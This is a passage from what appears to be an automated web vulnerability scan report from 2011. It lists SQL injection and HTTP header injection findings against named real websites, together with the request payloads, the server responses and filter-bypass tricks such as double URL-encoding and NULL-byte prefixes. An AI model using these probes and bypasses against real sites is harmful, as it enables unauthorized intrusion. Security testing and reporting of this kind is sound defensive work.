GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.21. http://shop.winamp.com/store [s_pers cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The s_pers cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_pers cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:32 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.22. http://shop.winamp.com/store [s_sess cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://shop.winamp.com |
Path: | /store |
Issue detail
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
Request 2
GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.23. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | https://shop.winamp.com |
Path: | /store |
Issue detail
The BIGipServerp-drh-dc1pod5Request 1
GET /store?Action=DisplayPage Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 82107 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <pre>java.lang.RuntimeException: java.lang.RuntimeExc at com.digitalriver.site at com.digitalriver.taglib ...[SNIP]... |
Request 2
GET /store?Action=DisplayPage Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response 2
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private Expires: Wed, 31 Dec 1969 23:59:59 GMT Location: http://shop.winamp.com:80 Content-Type: text/plain Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
1.24. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://static.ak.fbcdn |
Path: | /rsrc.php/v1/yF/r |
Issue detail
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /rsrc.php/v1/yF/r'%20and%201%3d1--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 1
HTTP/1.1 404 Not Found Content-Length: 7 Content-Type: text/html; charset=utf-8 X-Bad-Checksum: yF X-Powered-By: HPHP X-FB-Server: 10.138.64.184 Vary: Accept-Encoding Cache-Control: public, max-age=86400 Expires: Sun, 27 Feb 2011 23:10:57 GMT Date: Sat, 26 Feb 2011 23:10:57 GMT Connection: close /*bcs*/ |
Request 2
GET /rsrc.php/v1/yF/r'%20and%201%3d2--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 2
HTTP/1.1 403 Forbidden X-Bad-Prefix: /v1/yF/r' and 1=2-- /QsQtRaU6mGT.css Content-Type: text/html; charset=utf-8 X-Powered-By: HPHP X-FB-Server: 10.138.17.183 Content-Length: 0 Vary: Accept-Encoding Expires: Sat, 26 Feb 2011 23:10:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Feb 2011 23:10:57 GMT Connection: close |
1.25. http://www.companypond.com/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.companypond |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /?1%00'=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 1
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:16 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fa03e4bec9c6 X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta htt ...[SNIP]... Marketing Company based in Morristown, NJ with offices in Miami, FL. Our primary focus is helping small to medium sized businesses achieve online marketing success. Our clients come to Optimum7 after failing to achieve their marketing objectives online and... <a href="/optimum7" title="Profile for optimum7"> ...[SNIP]... |
Request 2
GET /?1%00''=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 2
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:18 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fdc0940037a6 X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66519 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta htt ...[SNIP]... |
1.26. http://www.dreamhost.com/r.cgi [129733 parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dreamhost.com |
Path: | /r.cgi |
Issue detail
The 129733 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 129733 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /r.cgi?129733' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 1 (redirected)
HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:38 GMT Content-Type: text/html Connection: close Content-Length: 575 <html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53< </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]... |
Request 2
GET /r.cgi?129733'' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 2 (redirected)
HTTP/1.1 302 Found Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:39 GMT Content-Type: text/plain Connection: close Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:20 GMT Set-Cookie: referred=rewards%7C129733 Set-Cookie: redir=12722601; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT Location: http://www.dreamhost.com/ Content-Length: 0 |
1.27. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dreamhost.com |
Path: | /r.cgi |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /r.cgi?1'=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 1 (redirected)
HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:36 GMT Content-Type: text/html Connection: close Content-Length: 575 <html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53< </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]... |
Request 2
GET /r.cgi?1''=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 2 (redirected)
HTTP/1.1 302 Found Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:37 GMT Content-Type: text/plain Connection: close Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT Set-Cookie: referred=rewards%7C1%27 Set-Cookie: redir=12722600; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT Location: http://www.dreamhost.com/ Content-Length: 0 |
1.28. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.sti-cs.com |
Path: | /Portfolio/Trades-and |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Request
GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:56 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]... |
1.29. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.sti-cs.com |
Path: | /Portfolio/Trades-and |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Request
GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:03 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]... |
1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.sti-cs.com |
Path: | /Portfolio/Trades-and |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Request
GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14496 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]... |
2. HTTP header injection previous next
There are 9 instances of this issue:
- http://ad.doubleclick.net/adj/N2998.159462
.7724395940621/B4924654.4 [REST URL parameter 1] - http://ad.doubleclick.net/adj/N2998.159462
.7724395940621/B5077405 .10 [REST URL parameter 1] - http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
- https://login.oracle.com/pls/orasso/orasso.wwsso
_app_admin.ls_login [Site2pstoreToken parameter] - http://tacoda.at.atwola.com/rtx/r.js [N cookie]
- http://tacoda.at.atwola.com/rtx/r.js [si parameter]
- http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
- http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
- http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
2.1. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N2998.159462 |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 2de58%0d%0a6d24920450 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /2de58%0d%0a6d24920450/N2998.159462.772439 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b|578176 |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2de58 6d24920450/N2998.159462.772439 Date: Sun, 27 Feb 2011 17:46:27 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N2998.159462 |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 62182%0d%0a5ce3b6d291b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /62182%0d%0a5ce3b6d291b/N2998.159462.772439 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b|578176 |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62182 5ce3b6d291b/N2998.159462.772439 Date: Sun, 27 Feb 2011 17:46:04 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 51ad3%0d%0aeafac43fb55 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.Request
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C4=; eyeblaster=BWVal=&BWDate= |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=&BWDate= eafac43fb55; expires=Fri, 27-May-2011 21: 31:25 GMT; domain=bs.serving-sys.com Set-Cookie: A3=heSmakII0c9M00001 Set-Cookie: B3=8r8g0000000001tf7 Set-Cookie: u2=3a6c8499-0c84-46b7 P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 27 Feb 2011 02:31:24 GMT Connection: close Content-Length: 2193 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... |
2.4. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Site2pstoreToken parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://login.oracle.com |
Path: | /pls/orasso/orasso.wwsso |
Issue detail
The value of the Site2pstoreToken request parameter is copied into the Location response header. The payload 21d1d%0d%0adea71b54e71 was submitted in the Site2pstoreToken parameter. This caused a response containing an injected HTTP header.Request
GET /pls/orasso/orasso.wwsso Host: login.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ORASSO_AUTH_HINT=v1.0 |
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 26 Feb 2011 23:29:47 GMT Server: Oracle-Application-Server Content-Length: 4725 Set-Cookie: ORASSO_AUTH_HINT=v1.0 Cache-Control: private Location: https://login.oracle.com dea71b54e71&p_error_code=&p_submit Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerloginadc <HTML><HEAD><TITLE ...[SNIP]... |
2.5. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
Issue detail
The value of the N cookie is copied into the Set-Cookie response header. The payload bf012%0d%0af7b9b665bf was submitted in the N cookie. This caused a response containing an injected HTTP header.Request
GET /rtx/r.js?cmd=ADN&si Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZs |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:35:33 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:50:33 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZs Set-Cookie: ANRTT=53615^1^1299284361 Set-Cookie: Tsid=0^1298774133 Set-Cookie: TData=99999|^|53575|53656 Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:35:33 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:ca3680f9be00bf67 f7b9b665bf,c638727a4faa7467533 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT ntCoent-Length: 176 Content-Type: application/x-javascript Content-Length: 176 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656 ANRTXR(); |
2.6. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
Issue detail
The value of the si request parameter is copied into the Set-Cookie response header. The payload 8ecf0%0d%0a6420ebe94a was submitted in the si parameter. This caused a response containing an injected HTTP header.Request
GET /rtx/r.js?cmd=ADN&si=8ecf0%0d%0a6420ebe94a&pi=M&xs=3&pu=http%253A/ Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZs |
Response
